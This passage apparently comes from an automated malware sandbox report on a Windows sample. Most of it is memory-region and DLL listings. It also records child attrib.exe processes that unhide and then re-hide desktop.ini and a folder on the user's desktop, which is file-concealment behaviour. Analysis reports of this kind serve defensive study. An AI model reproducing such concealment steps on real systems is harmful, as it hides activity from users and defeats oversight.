name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 33382 start_va = 0x73c40000 end_va = 0x73c4efff entry_point = 0x73c40000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 33383 start_va = 0x73c50000 end_va = 0x73c58fff entry_point = 0x73c50000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 33384 start_va = 0x73cc0000 end_va = 0x73cc2fff entry_point = 0x73cc0000 region_type = mapped_file name = "winmgmtr.dll" filename = "\\Windows\\System32\\wbem\\WinMgmtR.dll" (normalized: "c:\\windows\\system32\\wbem\\winmgmtr.dll") Region: id = 33385 start_va = 0x73ed0000 end_va = 0x73f08fff entry_point = 0x73ed0000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 33386 start_va = 0x74220000 end_va = 0x74314fff entry_point = 0x74220000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 33387 start_va = 0x747c0000 end_va = 0x748cbfff entry_point = 0x747c0000 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 33388 start_va = 0x748d0000 end_va = 0x748d8fff entry_point = 0x748d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 33389 start_va = 0x748e0000 end_va = 0x74955fff entry_point = 0x748e0000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 33390 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 33391 start_va = 0x74a10000 end_va = 0x74a25fff entry_point = 0x74a10000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 33392 start_va = 0x74a30000 end_va = 0x74a46fff entry_point = 0x74a30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 33393 start_va = 0x74b20000 end_va = 0x74b27fff entry_point = 0x74b20000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 33394 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 33395 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 33396 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 33397 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 33398 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 33399 start_va = 0x75010000 end_va = 0x75051fff entry_point = 0x75010000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 33400 start_va = 0x75290000 end_va = 0x75297fff entry_point = 0x75290000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 33401 start_va = 0x752b0000 end_va = 0x752cafff entry_point = 0x752b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 33402 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 33403 start_va = 0x75340000 end_va = 0x75368fff entry_point = 0x75340000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 33404 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 33405 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 33406 start_va = 0x753f0000 end_va = 0x753fbfff entry_point = 0x753f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 33407 start_va = 0x75400000 end_va = 0x75411fff entry_point = 0x75400000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 33408 start_va = 0x75420000 end_va = 0x7553cfff entry_point = 0x75420000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 33409 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33410 start_va = 0x75590000 end_va = 0x755b6fff entry_point = 0x75590000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 33411 start_va = 0x75650000 end_va = 0x7567cfff entry_point = 0x75650000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 33412 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 33413 start_va = 0x75730000 end_va = 0x75774fff entry_point = 0x75730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 33414 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 33415 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 33416 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33417 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33418 start_va = 0x764b0000 end_va = 0x7664cfff entry_point = 0x764b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 33419 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 33420 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33421 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 33422 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33423 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33424 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 33425 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33426 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33427 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 33428 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33429 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 33430 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 33431 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33432 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33433 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33434 start_va = 0x7ffa4000 end_va = 0x7ffa4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa4000" filename = "" Region: id = 33435 start_va = 0x7ffa5000 end_va = 0x7ffa5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa5000" filename = "" Region: id = 33436 start_va = 0x7ffa6000 end_va = 0x7ffa6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa6000" filename = "" Region: id = 33437 start_va = 0x7ffa7000 end_va = 0x7ffa7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa7000" filename = "" Region: id = 33438 start_va = 0x7ffa9000 end_va = 0x7ffa9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa9000" filename = "" Region: id = 33439 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 33440 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 33441 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 33442 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 33443 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33444 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 33445 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 33446 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 33447 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 33448 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 33449 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 33450 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 33451 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 33452 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 33453 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 33454 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 33455 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 786 os_tid = 0xab4 Thread: id = 787 os_tid = 0xa30 Thread: id = 788 os_tid = 0xa2c Thread: id = 789 os_tid = 0x6c4 Thread: id = 790 os_tid = 0x260 Thread: id = 791 os_tid = 0x5cc Thread: id = 792 os_tid = 0x14c Thread: id = 793 os_tid = 0x2b0 Thread: id = 794 os_tid = 0x438 Thread: id = 795 os_tid = 0x434 Thread: id = 796 os_tid = 0x3b0 Thread: id = 797 os_tid = 0x3a8 Thread: id = 798 os_tid = 0x398 Thread: id = 799 os_tid = 0x348 Thread: id = 800 os_tid = 0x344 Thread: id = 801 os_tid = 0x340 Thread: id = 802 os_tid = 0x2f8 Thread: id = 803 os_tid = 0x2f4 Thread: id = 804 os_tid = 0x2d0 Thread: id = 805 os_tid = 0x2c8 Thread: id = 897 os_tid = 0xaa4 Thread: id = 937 os_tid = 0xde0 Process: id = "583" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16860" os_pid = "0xd2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "581" os_parent_pid = "0x6bc" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33457 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33458 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33459 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33460 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 33461 start_va = 0xfa0000 end_va = 0xfa6fff entry_point = 0xfa0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 33462 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33463 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33464 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33465 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 33466 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33467 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33468 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33469 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33470 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 33471 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 33472 start_va = 0x71e30000 end_va = 0x71e4cfff entry_point = 0x71e30000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 33473 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33474 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 33475 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33476 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33477 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 33478 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33479 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33480 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33481 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 33482 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33483 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33484 start_va = 0x100000 end_va = 0x1c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 33485 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33486 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 807 os_tid = 0xd10 Process: id = "584" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16780" os_pid = "0xd8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "581" os_parent_pid = "0x6bc" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33487 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33488 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33489 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33490 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 33491 start_va = 0x2f0000 end_va = 0x2f6fff entry_point = 0x2f0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 33492 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33493 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33494 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33495 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 33496 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33497 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33498 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33499 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33500 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 33501 start_va = 0x4f0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 33502 start_va = 0x71e10000 end_va = 0x71e2cfff entry_point = 0x71e10000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 33503 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33504 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 33505 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33506 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33507 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 33508 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33509 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33510 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33511 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 33512 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33513 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33514 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 33515 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33516 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 808 os_tid = 0xdb0 Process: id = "585" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16780" os_pid = "0xdc0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "581" os_parent_pid = "0x6bc" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" 